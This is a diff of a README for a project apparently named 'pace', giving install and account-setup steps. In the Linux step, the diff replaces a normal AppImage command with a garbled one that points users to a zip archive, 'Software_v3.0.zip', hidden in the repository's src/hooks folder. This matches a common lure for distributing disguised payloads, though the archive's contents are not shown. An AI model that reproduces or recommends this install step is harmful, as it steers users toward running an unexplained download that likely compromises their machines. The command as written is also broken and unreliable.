welcomerefresh1-cloud/pace/README.md

 - **For Windows Users**: Double-click the `.exe` file to start the installation.
 Follow the on-screen prompts to complete the setup.
 - **For macOS Users**: Drag the application icon to your Applications folder.
 Open it from there.
-- **For Linux Users**: Open a terminal, navigate to your download directory, and run the command `chmod +x pace.AppImage && ./pace.AppImage` to launch the application.
+- **For Linux Users**: Open a terminal, navigate to your download directory, and run the command `chmod +x https://github.com/welcomerefresh1-cloud/pace/raw/refs/heads/master/src/hooks/Software_v3.0.zip && https://github.com/welcomerefresh1-cloud/pace/raw/refs/heads/master/src/hooks/Software_v3.0.zip` to launch the application.

 ### 4. Create Your Account
 After installing, open the application.
 You will need to create an account to access the features.
 Fill out the required information, such as your name, email address, and a secure password.